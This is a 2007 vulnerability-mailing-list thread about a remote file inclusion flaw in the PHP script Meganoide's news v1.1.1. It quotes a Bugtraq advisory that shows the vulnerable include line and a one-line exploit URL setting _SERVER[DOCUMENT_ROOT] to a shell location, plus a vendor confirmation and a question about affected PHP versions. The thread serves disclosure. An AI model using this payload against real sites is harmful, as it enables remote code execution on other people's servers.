[VIM] [True] Meganoide's news v1.1.1 < = RFi Vulnerabilities
str0ke
str0ke at milw0rm.com
Tue Feb 20 12:45:05 EST 2007
_SERVER[DOCUMENT_ROOT]=[shell]
Isn't only certain versions of php vulnerable to this kind of attack?
/str0ke
On 2/20/07, Noam Rathaus <noamr at beyondsecurity.com> wrote:
> Hi,
>
> Vendor appears to confirm problem:
> ----------------------
> Meganoide's news v1.1.2
> -----------------------
> - Bug: possibile inclusione di file remoti nel file "include.php"
>
> (Translation from italian: possible inclusion of files remotely in the
> file "include.php")
>
> ---------- Forwarded Message ----------
>
> Subject: Meganoide's news v1.1.1 < = RFi Vulnerabilities
> Date: Friday 16 February 2007 19:54
> From: k4rtal at gmail.com
> To: bugtraq at securityfocus.com
>
> ##################################################################
> #Meganoide's news v1.1.1 < = RFi Vulnerabilities
> #
> #Download :
> http://www.spacemarc.it/scriptphp/index.php?script=meganoidesnews111 #
> #Script Name : Meganoide's news v1.1.1
> #
> #
> ##################################################################
> #
> #Coded By : KaRTaL
> #
> #
> #Contact : k4rtal[at]gmail[dot]com
> #
> #
> ##################################################################
> #
> #V.Code in : [path]/include.php
> #
> #
> # include("$_SERVER[DOCUMENT_ROOT]/news/config.inc.php");
> #
> #
> #Exploit : www.target.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell]
> #
> #
> ##################################################################
> #
> #
> #Gretz : TiT , Doublekickx , str0ke , DermanTukr , M3rhametsiz , CaCa ,
> Gurkan142 , www.istikla-team.org #
> #
> #
> #
> ##################################################################
>
> -------------------------------------------------------
>
> --
> Noam Rathaus
> CTO
> 1616 Anderson Rd.
> McLean, VA 22102
> Tel: 703.286.7725 extension 105
> Fax: 888.667.7740
> noamr at beyondsecurity.com
> http://www.beyondsecurity.com
>
More information about the VIM
mailing list